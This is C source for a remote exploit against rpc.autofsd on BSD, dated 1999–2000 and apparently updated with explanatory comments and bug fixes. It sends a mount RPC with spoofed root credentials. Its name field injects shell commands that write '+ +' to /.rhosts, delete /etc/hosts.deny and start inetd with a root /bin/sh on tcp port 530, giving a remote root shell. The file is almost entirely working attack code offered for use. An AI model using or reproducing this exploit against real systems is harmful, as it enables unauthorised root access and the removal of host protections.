// *** Synnergy Networks

// * Description:
//
// Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell
// on tcp port 530.

// * Author:
//
// guidob (guidob@synnergy.net)
// Synnergy Networks (c) 1999, http://www.synnergy.net

// * Greets:
//
// Synnergy Networks, LoU, Cindy

// * Comments:
//
// This will not work on all types and/or versions. 

// *** Synnergy Networks

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <signal.h>

/* RPC identity of the target service as handed to clntudp_create() and
 * clnt_call(): program 100099 (autofs), version 1, procedure 1 (mount). */
#define AUTOFS_PROG ((u_long)100099)
#define AUTOFS_VERS ((u_long)1)
#define AUTOFS_MOUNT ((u_long)1)

/* AT: seconds until alarm() fires and signal_handler() ends the process;
 * this is the real upper bound on the run, regardless of the RPC timeouts. */
#define AT 8
/* Maximum lengths passed to xdr_string() for each mntrequest field. */
#define A_MAXNAME 255
#define A_MAXOPTS 255
#define A_MAXPATH 1024

/* Argument of the AUTOFS_MOUNT procedure, serialised by xdr_mntrequest().
 * Every field is an XDR string; the on-the-wire bounds are A_MAXNAME for
 * name and map, A_MAXOPTS for opts and A_MAXPATH for path.  The "[2000]"
 * annotations on map/opts are the original author's and do not match the
 * 255-byte limit xdr_mntrequest() actually enforces. */
struct mntrequest {
        char *name;     /* name to be looked up (carries the payload in main()) */
        char *map;      /* map to use     [2000]*/
        char *opts;     /* default options[2000]*/
        char *path;     /* mountpoint to use    */
};

/* Reply of the AUTOFS_MOUNT procedure, decoded by xdr_mntres(). */
struct mntres {
        int status;     /* 0=OK, otherwise an errno from <sys/errno.h> */
};

/*
 * XDR (de)serialiser for struct mntrequest.
 *
 * Encodes or decodes the four string fields in declaration order, each
 * bounded by the matching A_MAX* limit.  Stops at the first field that
 * xdr_string() rejects and reports FALSE; TRUE when all four succeed.
 */
bool_t xdr_mntrequest(XDR *xdrs, struct mntrequest *objp) {
  return xdr_string(xdrs, &objp->name, A_MAXNAME)
      && xdr_string(xdrs, &objp->map,  A_MAXNAME)
      && xdr_string(xdrs, &objp->opts, A_MAXOPTS)
      && xdr_string(xdrs, &objp->path, A_MAXPATH);
}
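/*
 * SIGALRM handler installed by main(); fires AT seconds after start and
 * terminates the process with status 0.
 *
 * sig  the signal number signal() delivers; unused.
 *
 * Fixes: the original was declared void(void), which is not the function
 * pointer type signal() takes, and called exit(), which is not
 * async-signal-safe.  _exit() is.
 */
void signal_handler(int sig) {
        (void)sig;
        _exit(0);
}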
/*
 * XDR (de)serialiser for struct mntres: a single int status word.
 * Returns TRUE when xdr_int() succeeds, FALSE otherwise.
 */
bool_t xdr_mntres(XDR *xdrs, struct mntres *objp) {
  return xdr_int(xdrs, &objp->status) ? TRUE : FALSE;
}

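/*
 * Entry point: send one AUTOFS_MOUNT request to rpc.autofsd on argv[1].
 *
 * argv[1]  target host, dotted-quad or resolvable name (required).
 * Returns  0 when the RPC round-trip completed (whatever the server's
 *          status word says); 1 on usage, resolution or RPC failure.
 *
 * The request's `name` field starts with ';' and carries shell commands
 * (string below).  The exploit relies on the daemon handing that field to
 * a shell unescaped -- presumably through its mount helper, which this
 * file does not show.  alarm(AT) bounds the whole run: when it fires,
 * signal_handler() terminates the process, so the 25 s clnt_call timeout
 * is never actually reached.
 *
 * Fixes over the original: explicit `int` return type (implicit int is not
 * valid since C99); argv[1] checked before use; h_addr copied with memcpy
 * of sizeof(in_addr) instead of a u_long read, which on LP64 reads 8 bytes
 * out of the 4-byte address; the reply decoded into a real struct mntres
 * rather than into the bytes of a pointer variable; auth and client
 * handles released on every path; non-zero exit on every error.
 */
int main(int argc, char **argv) {
  CLIENT *cl;
  struct mntrequest mntreq;
  struct mntres res;
  struct sockaddr_in target;
  struct hostent *hp;
  struct timeval tm;
  const char *host;
  enum clnt_stat rc;
  int sd = RPC_ANYSOCK;

  if (argc < 2) {
    fprintf(stderr, "usage: %s <host>\n", argv[0]);
    return 1;
  }
  host = argv[1];

  /* hard cap on the run -- see signal_handler() */
  signal(SIGALRM, signal_handler);
  alarm(AT);

  memset(&target, 0, sizeof target);
  target.sin_family = AF_INET;
  target.sin_port = 0;            /* 0: clntudp_create asks the portmapper */
  target.sin_addr.s_addr = inet_addr(host);
  if (target.sin_addr.s_addr == INADDR_NONE) {
    hp = gethostbyname(host);
    if (hp == NULL || hp->h_addrtype != AF_INET
        || hp->h_length != (int)sizeof target.sin_addr) {
      fprintf(stderr, "%s: cannot resolve\n", host);
      return 1;
    }
    memcpy(&target.sin_addr, hp->h_addr, sizeof target.sin_addr);
  }

  tm.tv_sec = 8;                  /* per-retry wait for clntudp_create */
  tm.tv_usec = 0;
  cl = clntudp_create(&target, AUTOFS_PROG, AUTOFS_VERS, tm, &sd);
  if (cl == NULL) {
    clnt_pcreateerror("clnt_create");
    return 1;
  }
  /* AUTH_UNIX credentials claiming uid 0 / gid 0 from "localhost" */
  cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
  tm.tv_sec = 25;                 /* total clnt_call timeout; alarm(AT) fires first */

  /*
   * Payload carried in `name`: opens /.rhosts, removes /etc/hosts.deny,
   * writes an inetd entry for the "courier" service (tcp/530 per the file
   * header) that runs /bin/sh as root into /tmp/bob, and starts inetd on it:
   *   echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob; inetd /tmp/bob
   */
  mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob";
  mntreq.map = "/bin/true";
  mntreq.path = "/hosts";
  mntreq.opts = "";
  memset(&res, 0, sizeof res);

  rc = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest, (void *)&mntreq,
                 (xdrproc_t)xdr_mntres, (void *)&res, tm);
  if (rc != RPC_SUCCESS) {
    clnt_perror(cl, "clnt_call");
    auth_destroy(cl->cl_auth);
    clnt_destroy(cl);
    return 1;
  }

  /* status: 0=OK, otherwise an errno (see struct mntres) */
  printf("autofsd replied, status=%d\n", res.status);
  auth_destroy(cl->cl_auth);
  clnt_destroy(cl);
  return 0;
}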

// EOF
/*                    www.hack.co.za           [21 July 2000]*/